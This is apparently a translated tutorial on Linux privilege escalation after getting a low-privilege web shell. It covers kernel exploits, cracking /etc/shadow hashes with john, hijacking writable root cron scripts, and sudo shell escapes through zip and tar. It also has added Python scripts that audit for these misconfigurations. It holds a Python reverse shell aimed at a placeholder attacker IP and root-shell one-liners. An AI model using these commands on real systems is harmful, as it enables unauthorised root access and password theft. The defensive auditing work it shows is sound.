1. Introduction
Often, when we take down a server through its web service, the shell we obtain runs only as a low-privileged user (such as www-data). For intranet penetration, the prerequisites for escalating to root privilege are:
- Have obtained a low-privilege shell
- Common tools such as nc, python, perl, etc. are present on the compromised machine
- Have permission to upload and download files
2. Kernel vulnerability escalation
View release version
cat /etc/issue
cat /etc/*-release
View kernel version
uname -a
Search for kernel overflow exploit code (the distribution and kernel version are placeholders)
searchsploit <distribution> <kernel version>
Download the kernel overflow code, then compile and execute it
gcc xxx.c -o exploit
chmod +x exploit
./exploit
3. Cleartext root password escalation
Most Linux system passwords are closely tied to the two configuration files /etc/passwd and /etc/shadow. The users are stored in passwd, and the password hashes are stored in shadow. For security reasons, passwd is readable by all users and writable only by root; /etc/shadow is readable and writable by root only.
For example, cracking Linux usernames and their corresponding passwords:
# obtain the two corresponding files
/etc/passwd /etc/shadow
unshadow passwd shadow > cracked
john cracked
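The reason /etc/shadow is kept root-only is that a world-readable copy is exactly what the unshadow/john step above needs. The following audit script is an added example (not part of the original page) that checks the mode and owner of both files against expected maximums; the expected values 0644 for passwd and 0640 for shadow are this example's assumptions, since distributions differ (Debian-style systems use root:shadow 0640, others use 0000 or 0400).

```python
import os
import stat

# Expected maximum permission bits (assumptions for this example; anything
# beyond these bits is reported as a finding).
EXPECTED_MAX = {
    "/etc/passwd": 0o644,
    "/etc/shadow": 0o640,
}


def check_mode(path, st_mode, st_uid, expected_max):
    """Return a list of findings for one file, given its stat mode and owner uid."""
    findings = []
    perm = stat.S_IMODE(st_mode)
    if st_uid != 0:
        findings.append(f"{path}: owned by uid {st_uid}, not root")
    extra = perm & ~expected_max
    if extra:
        findings.append(f"{path}: mode {perm:04o} exceeds expected {expected_max:04o}")
    if path.endswith("shadow") and perm & stat.S_IROTH:
        findings.append(f"{path}: world-readable, hashes can be copied for offline cracking")
    if perm & stat.S_IWOTH:
        findings.append(f"{path}: world-writable, any user can alter accounts")
    return findings


def audit_account_files(stat_fn=os.stat):
    """Stat the real files (if present) and collect findings per path."""
    results = {}
    for path, expected in EXPECTED_MAX.items():
        try:
            st = stat_fn(path)
        except (FileNotFoundError, PermissionError):
            continue
        results[path] = check_mode(path, st.st_mode, st.st_uid, expected)
    return results


if __name__ == "__main__":
    for path, findings in audit_account_files().items():
        print(path, "OK" if not findings else "; ".join(findings))
```

check_mode is separated from the stat call so the logic can be exercised on constructed mode values; on a live host, run the script as any user (stat does not require read permission on the file) and fix any finding with chown root and chmod to the distribution's default.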
4. Scheduled task privilege escalation
There may be scheduled tasks on the system. Generally, these tasks are managed by crontab and run with the privileges of the user that owns them.
cat /etc/crontab
Non-root users cannot list the root user's scheduled tasks, but the system-wide scheduled tasks under /etc/ can be listed.
By default, these programs are executed with root privileges. If one of them is writable by any user, you can modify the script to connect back with a root shell.
If a Python script is executed on a schedule, you can replace it with the following example:
#!/usr/bin/python
import os,subprocess,socket
s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(("攻击机IP地址","攻击机监听端口"))
os.dup2(s.fileno(),0)
os.dup2(s.fileno(),1)
os.dup2(s.fileno(),2)
p = subprocess.call(["/bin/sh","-i"])
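The condition that makes the replacement above possible is a root cron job whose script (or the directory holding it) is writable by a non-root user. The following script is an added example, not part of the original page: it parses a system crontab in the /etc/crontab format (with the user field), resolves the first absolute-path token of each root job, and reports any whose file or parent directory is group- or world-writable. The crontab contents and the file tree it builds under a temporary directory are constructed for the demonstration; the prefix parameter exists only so the demo can point the absolute paths at that temporary tree.

```python
import os
import shlex
import stat
import tempfile

# Constructed sample in /etc/crontab format: minute hour dom mon dow user command.
SAMPLE_CRONTAB = """\
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
# m h dom mon dow user  command
*/5 *   * * *   root    /usr/local/bin/backup.py
0  4    * * *   root    /usr/local/bin/rotate.sh
17 *    * * *   root    cd / && run-parts --report /etc/cron.hourly
0  3    * * *   www-data /var/www/cleanup.sh
"""


def parse_system_crontab(text):
    """Return (user, command) for each job line, skipping comments and VAR=value lines."""
    jobs = []
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        fields = line.split(None, 6)
        if "=" in fields[0]:  # environment assignment such as SHELL=/bin/sh
            continue
        if len(fields) < 7:
            continue
        jobs.append((fields[5], fields[6]))
    return jobs


def first_program(command):
    """Return the command's first token if it is an absolute path, else None.

    Commands resolved through PATH (like "cd / && run-parts ...") are skipped;
    auditing those requires checking every PATH directory as well."""
    try:
        tokens = shlex.split(command)
    except ValueError:
        return None
    if tokens and tokens[0].startswith("/"):
        return tokens[0]
    return None


def writable_by_others(path):
    """True if the path is group- or world-writable."""
    st = os.stat(path)
    return bool(stat.S_IMODE(st.st_mode) & (stat.S_IWGRP | stat.S_IWOTH))


def audit_crontab(text, prefix=""):
    """Return (program, reason) findings for root jobs whose script can be replaced."""
    findings = []
    for user, command in parse_system_crontab(text):
        if user != "root":
            continue
        program = first_program(command)
        if program is None:
            continue
        path = prefix + program
        if not os.path.exists(path):
            continue
        if writable_by_others(path):
            findings.append((program, "script writable by non-root users"))
        elif writable_by_others(os.path.dirname(path)):
            findings.append((program, "directory writable, script can be replaced"))
    return findings


def demo():
    """Build a constructed tree with one misconfigured root job and audit it."""
    root = tempfile.mkdtemp()
    for d in ("/usr/local/bin", "/var/www"):
        os.makedirs(root + d)
        os.chmod(root + d, 0o755)
    bad = root + "/usr/local/bin/backup.py"
    with open(bad, "w") as f:
        f.write("#!/usr/bin/python\n")
    os.chmod(bad, 0o777)  # the misconfiguration: any user can edit a root job
    for good in ("/usr/local/bin/rotate.sh", "/var/www/cleanup.sh"):
        with open(root + good, "w") as f:
            f.write("#!/bin/sh\n")
        os.chmod(root + good, 0o755)
    return audit_crontab(SAMPLE_CRONTAB, prefix=root)


if __name__ == "__main__":
    for program, reason in demo():
        print(f"{program}: {reason}")
```

On a live host, call audit_crontab(open("/etc/crontab").read()) and repeat for each file under /etc/cron.d; the fix for any finding is chown root and removing group/world write bits from both the script and its directory.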
5. Password reuse login privilege escalation
Many administrators reuse passwords, so the database or web backend login password may also be the root password.
You can try to log in with ssh, but some ssh configurations prohibit root login.
You can also try entering the password from the low-privileged shell, but Linux requires the password to be entered from a terminal device; Python can be used to simulate a terminal device:
python -c "import pty;pty.spawn('/bin/bash')"
Use sudo -l to view the commands the current user may run as root, which can be used to escalate privileges.
Use zip to escalate privileges
touch exploit
sudo -u root zip exploit.zip exploit -T --unzip-command="sh -c /bin/bash"
Use tar to escalate privileges
sudo -u root tar cf /dev/null exploit --checkpoint=1 --checkpoint-action="/bin/bash"
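Both of the sudo tricks above rely on a sudoers entry that lets a user run, as root, a program whose documented options spawn a child process. The following is an added example, not part of the original page: it parses the per-command lines of `sudo -l` output (the sample output is constructed), keeps entries that run as root or ALL, and reports those whose binary is on a watch list unless the entry carries the sudoers NOEXEC tag, which blocks the child exec that zip and tar use here. The watch list is an assumption for this example (zip and tar come from this page; the others are common additions) and is not exhaustive.

```python
import os
import re

# Binaries whose normal options can run another program; zip and tar are the
# two shown on this page, the rest are assumed additions for the example.
SHELL_ESCAPE_BINARIES = {"zip", "tar", "vim", "less", "find", "awk", "python"}

# Constructed sample of `sudo -l` output for a low-privileged web user.
SAMPLE_SUDO_L = """\
Matching Defaults entries for www-data on web01:
    env_reset, secure_path=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin

User www-data may run the following commands on web01:
    (root) NOPASSWD: /usr/bin/zip
    (root) /usr/bin/tar
    (root) NOEXEC: /usr/bin/vim
    (backup) /usr/bin/rsync
"""

# (runas) TAG: TAG: /path/to/command args
ENTRY_RE = re.compile(r"^\s*\((?P<runas>[^)]+)\)\s*(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmd>/.*)$")


def parse_sudo_l(text):
    """Return (runas, [tags], command) for each per-command line."""
    entries = []
    for line in text.splitlines():
        m = ENTRY_RE.match(line)
        if m:
            tags = [t.rstrip(":") for t in m.group("tags").split()]
            entries.append((m.group("runas"), tags, m.group("cmd").strip()))
    return entries


def audit_sudo(text):
    """Return (command, tags) for root-level entries on the watch list without NOEXEC."""
    findings = []
    for runas, tags, cmd in parse_sudo_l(text):
        runas_user = runas.split(":")[0].strip()
        if runas_user not in ("root", "ALL"):
            continue
        binary = os.path.basename(cmd.split()[0])
        if binary in SHELL_ESCAPE_BINARIES and "NOEXEC" not in tags:
            findings.append((cmd, tags))
    return findings


if __name__ == "__main__":
    for cmd, tags in audit_sudo(SAMPLE_SUDO_L):
        print(f"{cmd} (tags: {', '.join(tags) or 'none'}): remove the entry or add NOEXEC:")
```

On a real host, feed the script the output of `sudo -l` for each service account; each finding is an entry to remove, replace with a narrower wrapper script owned by root, or at minimum tag with NOEXEC in sudoers.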